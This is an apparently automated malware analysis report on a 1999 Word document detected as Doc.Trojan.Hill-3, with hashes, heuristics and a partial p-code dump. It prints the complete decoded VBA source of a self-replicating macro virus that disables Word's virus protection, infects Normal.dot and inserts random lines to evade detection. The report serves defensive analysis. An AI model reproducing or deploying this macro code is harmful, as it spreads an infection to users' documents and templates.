Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 084d2c276c342153…

MALICIOUS

Office (OLE)

48.0 KB Created: 1999-05-02 10:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 23884d71515811f9b189aab3cecf3491 SHA-1: 77ff399dc0017339c90eb5a47a14587b9ee784f3 SHA-256: 084d2c276c342153fc49ae86b051d3adc26d0cab219d82510f5984f3375193ff
100 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV and contains legacy WordBasic auto-exec markers and VBA macros. The VBA code attempts to obfuscate and modify its own content and the Normal.dot template, suggesting an attempt to evade detection or establish persistence. The specific functions like 'MountainNT' and 'MountainAD' appear to be part of this obfuscation mechanism.

Heuristics 3

  • ClamAV: Doc.Trojan.Hill-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hill-3
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7440 bytes
SHA-256: 49f691d177e228b12164b401ef935df9a880e357cfb973bb0fd93a1985616849
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
'mountain
Private Sub Document_Close()
Dim j
   On Error Resume Next
   'Macro.Word97.Mountain by Duke/SMF
   Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
   Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
   Options.VirusProtection = False
   Options.ConfirmConversions = False
   Options.SaveNormalPrompt = False
   j = 1
   Randomize
   If NT.Lines(1, 1) <> "'mountain" Then
      For i = 1 To AD.CountOfLines
         NT.InsertLines j, AD.Lines(i, 1)
         j = j + 1
         Ex = Mid(AD.Lines(i, 1), 1, 1)
         If Ex = Asc(" ") Then MountainNT
      Next
   End If
   If AD.Lines(1, 1) <> "'mountain" Then
      For i = 1 To NT.CountOfLines
         AD.InsertLines i, NT.Lines(i, 1)
         j = j + 1
         Ex = Mid(NT.Lines(i, 1), 1, 1)
         If Ex = Asc(" ") Then MountainAD
      Next
   End If
End Sub
Function MountainNT()
   R = Rnd
   If R < 1 And R > 0.08 Then
      NT.InsertLines j, " S = " + Chr(34) + Gener + Chr(34)
   End If
   If R < 0.08 And R > 0.05 Then
      NT.InsertLines j, " '" + Gener
   End If
   If R < 0.05 And R > 0.03 Then
      NT.InsertLines j, "  "
   End If
   If R > 0.03 Then j = j + 1
End Function
Function MountainAD()
   R = Rnd
   If R < 1 And R > 0.08 Then
      AD.InsertLines j, " S = " + Chr(34) + Gener + Chr(34)
   End If
   If R < 0.08 And R > 0.05 Then
      AD.InsertLines j, " '" + Gener
   End If
   If R < 0.05 And R > 0.03 Then
      AD.InsertLines j, "  "
   End If
   If R > 0.03 Then j = j + 1
End Function
Function Gener()
   Gener = ""
   For i = 1 To Int(20 * Rnd + 1)
      Gener = Gener + Chr(Int(128 * Rnd + 48))
   Next
End Function

' Processing file: /opt/analyzer/scan_staging/cb4895ab01ed45cda0cea248cdb85965.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1182 bytes
' Macros/VBA/NewMacros - 9025 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0008 "mountain"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	Dim 
' 	VarDefn j
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	QuoteRem 0x0003 0x0021 "Macro.Word97.Mountain by Duke/SMF"
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AD 
' Line #7:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #9:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #10:
' 	LitDI2 0x0001 
' 	St j 
' Line #11:
' 	ArgsCall Read 0x0000 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0009 "'mountain"
' 	Ne 
' 	IfBlock 
' Line #13:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	MemLd CountOfLines 
' 	For 
' Line #14:
' 	Ld j 
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	Ld NT 
' 	ArgsMemCall InsertLines 0x0002 
' Line #15:
' 	Ld j 
' 	LitDI2 0x0001 
' 	Add 
' 	St j 
' Line #16:
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	St Ex 
' Line #17:
' 	Ld Ex 
' 	LitStr 0x0001 " "
' 	ArgsLd Asc 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ArgsCall MountainNT 0x0000 
' 	EndIf 
' Line #18:
' 	StartForVariable 
' 	Next 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0009 "'mountain"
' 	Ne 
' 	IfBlock 
' Line #21:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariab
... (truncated)